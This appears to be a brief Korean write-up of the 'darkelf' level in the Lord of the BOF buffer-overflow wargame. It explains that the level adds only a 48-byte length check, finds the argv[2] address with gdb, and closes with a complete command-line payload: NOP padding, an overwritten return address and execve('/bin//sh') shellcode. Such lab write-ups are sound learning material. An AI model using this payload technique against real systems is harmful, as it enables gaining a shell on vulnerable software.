LOB-darkelf

어떤 파일이 있는지 확인한후 cat명령어를 사용하여 darkelf.c 파일을 출력한다.

앞 문제랑 다를게 전혀 없다. //chck the length of argument가 추가 되긴 하였지만 buffer에 들어갈 인자에 길이 제한을 두어 48개가 넘지 못하게 할 뿐이다.

 

argv[2]를 이용하기 위해 gdb를 사용하여 주소를 찾아낸다.

 

첫번째 인자를 넣어주고 두번째 인자도 넣어 주소를 확인한다.

주소가 확인되었다 대략 0XBFFFFC50 정도 넣어주면 될것 같다.

 

패이로드를 작성한다.

./darkelf `python -c 'print "\x90"*44+"\x50\xfc\xff\xbf"+" "+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`